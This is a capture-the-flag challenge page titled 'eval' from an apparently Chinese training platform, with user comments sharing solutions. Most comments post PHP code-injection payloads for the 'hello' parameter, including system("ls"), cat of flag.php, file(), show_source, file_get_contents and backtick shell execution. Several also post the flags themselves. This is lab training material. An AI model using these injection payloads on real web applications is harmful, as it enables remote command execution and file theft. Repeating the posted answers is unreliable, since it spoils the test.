evalWEB 未解决

分数: 15 金币: 1
题目作者: harry
一  血: moren448
一血奖励: 1金币
解  决: 15182
提  示:
描  述:
eval
评论
马踏黄河两岸 11月前

../?hello=system("ls") 可以看见有flag.php继续命令执行将ls换成cat flag.php

回复 0

lilifanqian 1年前

flag{4cadd25b49840f0cdb999cdabc86b103}

回复 0

18843672580 1年前

flag{21ebfdf5494104f4f54eca2bdd3cb902}

回复 0

鸡你太美 1年前

http://114.67.175.224:14089//?hello=file('flag.php') flag{1c587b72b36adc6efad7f93dce06182f}

回复 2

啵咯啵咯 1年前

/?hello=show_source("./flag.php")

回复 1

deger 1年前

读懂php发现页面会执行在hello后面的语句,并且var_dump是PHP语言中的一个函数,用于打印变量的相关信息,在url后加/?hello=file('flag.php')会将flag文件中的文件打印出来,即可得到flag

回复 4

coo1an 1年前

/?hello=(`cat%20/flag`)

回复 0

大哥大 1年前

在url后加/?hello=file('flag.php')即可得到flag

回复 2

falg 1年前

直接在url后面加?hello=var_dump(file_get_contents("flag.php"))

回复 2

栗深林兮惊层颠 1年前

flag{ef6d4343155d2fc70bd72b9bd95f6229}

回复 0

WriteUp

image
harry

1 金币

评分(9)

解题动态

peaceminus1 攻破了该题 3小时前
CJ00q 攻破了该题 4小时前
wyswyswys 攻破了该题 6小时前
fxstu 攻破了该题 7小时前
smileblack 攻破了该题 8小时前
GOOFY 攻破了该题 11小时前
shayijlong 攻破了该题 1天前
果冻战士 攻破了该题 1天前
yfm277 攻破了该题 1天前
alwayslookpoomi 攻破了该题 1天前
2278788320 攻破了该题 1天前
swind11 攻破了该题 1天前
GTfree 攻破了该题 1天前
用户1119 攻破了该题 1天前
byx341 攻破了该题 1天前
2023329600155 攻破了该题 2天前
熊熊出没 攻破了该题 2天前
online 攻破了该题 2天前
晴天1 攻破了该题 2天前
poezhu 攻破了该题 2天前
问题反馈